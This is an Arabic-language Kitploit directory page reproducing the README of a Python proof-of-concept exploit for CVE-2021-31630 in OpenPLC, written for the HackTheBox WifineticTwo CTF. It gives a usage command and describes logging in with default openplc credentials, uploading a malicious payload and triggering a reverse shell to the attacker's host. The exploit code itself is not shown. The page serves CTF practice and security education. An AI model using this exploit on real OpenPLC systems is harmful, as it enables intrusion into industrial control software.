Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
htb-wifinetictwo-exploit — نص بايثون بسيط لاستغلال CVE-2021-31630 في HTB WifineticTwo CTF | Kitploit
أدوات/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليمأداة الوصول عن بعداستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

نص بايثون بسيط لاستغلال CVE-2021-31630 في HTB WifineticTwo CTF

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

CVE-2021-31630 إثبات المفهوم (PoC) للاستغلال

هذا البرنامج النصي بلغة بايثون هو إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2021-31630، والتي تستهدف ثغرة أمنية في OpenPLC تعمل على جهاز WifineticTwo على منصة HackTheBox. تم تصميمه للأغراض التعليمية فقط، بهدف توضيح عملية الاستغلال في بيئة محكومة.

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض البحث الأمني والتعليم فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. لن يتحمل المطور أي مسؤولية عن أي أضرار أو تهم جنائية ضد المستخدمين الذين يسيئون استخدام هذا الاستغلال.

المتطلبات الأساسية

قبل تشغيل هذا الاستغلال، تأكد من أن لديك:

  • Python 3 مثبتة على نظامك.
  • مكتبة requests مثبتة. يمكنك تثبيتها باستخدام pip install requests.

الاستخدام

لاستخدام هذا الاستغلال، يجب عليك تحديد عنوان URL للهدف، وعنوان IP المحلي (LHOST)، والمنفذ المحلي (LPORT) الذي يجب أن يتصل به الصدفة العكسية. اختيارياً، يمكنك تحديد اسم المستخدم وكلمة المرور لـ OpenPLC إذا كانت مختلفة عن الإعدادات الافتراضية.

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

الوسائط

  • --target - العنوان الأساسي للهدف. مثال: http://wifinetictwo.htb:8080
  • --lhost - عنوان IP للمضيف المحلي للصدفة العكسية لتتصل به.
  • --lport - المنفذ المحلي للصدفة العكسية لتتصل به.
  • --usr - (اختياري) اسم المستخدم لـ OpenPLC. القيمة الافتراضية هي openplc.
  • --pwd - (اختياري) كلمة المرور لـ OpenPLC. القيمة الافتراضية هي openplc.

الميزات

  • يعالج تلقائياً عملية تسجيل الدخول باستخدام بيانات الاعتماد المقدمة.
  • يصنع ويحمل حمولة ضارة لتحقيق تنفيذ الأوامر عن بُعد.
  • يبدأ صدفة عكسية تعود إلى عنوان IP والمنفذ المحددين من قبل المهاجم.

عملية الاستغلال

  1. تسجيل الدخول: يقوم البرنامج النصي بتسجيل الدخول إلى تطبيق OpenPLC باستخدام بيانات الاعتماد المقدمة.
  2. صنع الحمولة: يصنع بشكل ديناميكي حمولة ضارة مصممة لبدء صدفة عكسية.
  3. تحميل الحمولة: يقوم بتحميل الحمولة المُصنَّعة إلى الخادم.
  4. تشغيل الاستغلال: يقوم بتشغيل الاستغلال بمحاولة ترجمة الكود الضار المُحمَّل، مما يؤدي إلى صدفة عكسية.

الشكر والتقدير

  • شكر خاص لـ Fellipe Oliveira الذي اكتشف وأبلغ عن الثغرة CVE-2021-31630.
  • شكر لـ HackTheBox لتوفير بيئة واقعية للتدرب والتعلم عن الأمن السيبراني.
تنزيل الأداة